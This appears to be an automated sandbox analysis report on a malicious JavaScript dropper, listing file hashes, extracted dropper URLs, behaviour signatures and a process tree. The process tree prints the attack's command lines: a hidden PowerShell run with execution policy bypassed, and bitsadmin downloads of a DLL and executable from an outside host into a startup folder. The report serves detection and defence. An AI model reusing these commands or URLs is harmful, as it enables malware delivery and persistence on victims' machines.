
Analysis

  • max time kernel
    45s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/07/2023, 08:29

General

  • Target: fl180.js
  • Size: 45KB
  • MD5: de3d0a48c7a6b6552922f4e88c55bf83
  • SHA1: 2647c35cd861b225df8a6b34cb33724fce914a03
  • SHA256: d720c060a4057004961c8af319f08d30b286cd3639d0fc0429c26c3d7319991a
  • SHA512: 1edb43bfdc0d682343994169c762465080c700dfa78d581ba864755c884eb9002112b25e906033c9e5b2d7194dfa53e22457cc6047c390a0cc03db68ec50b928
  • SSDEEP: 768:JxyIPOhAwthDONQD2jjAHYH3GQuhKYNfHavg90dSDorycM8L:Jx0AwTDOC2j8W3GQuhKYNf6vgydko2cB

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    • exe.dropper: https://turvavalaisin.fi/loco.zip
    • exe.dropper: https://turvavalaisin.fi/files/

Signatures

  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin (1 TTPs, 2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (9 IoCs)

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\fl180.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rjribr2.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://turvavalaisin.fi/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2100
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://turvavalaisin.fi/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
        3⤵
        • Download via BitsAdmin
        PID:812

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\rjribr2.ps1
    Filesize: 1KB
    MD5: 9cf347f03513bd9be1a3244435aa0c2f
    SHA1: 4993c7374edcf81180753534cf03ff07648c140b
    SHA256: 9021259bb4d1de30103c74ab7da2ee868f3223a4dcaa9ffaa795b5a4b6b26812
    SHA512: ce267d8dfb48dbc80457a20fede0b5f728579677c82b6cf8321ac4fcee0062a1c2049ca47ec3a01e8c9e2a442a28caaf2471fc1bf630ecf62b98950f1deb90c3

  • memory/2404-60-0x000000001B290000-0x000000001B572000-memory.dmp (Filesize: 2.9MB)
  • memory/2404-61-0x0000000002360000-0x0000000002368000-memory.dmp (Filesize: 32KB)
  • memory/2404-63-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)
  • memory/2404-62-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)
  • memory/2404-65-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)
  • memory/2404-66-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)
  • memory/2404-67-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)
  • memory/2404-68-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)
  • memory/2404-69-0x0000000002730000-0x00000000027B0000-memory.dmp (Filesize: 512KB)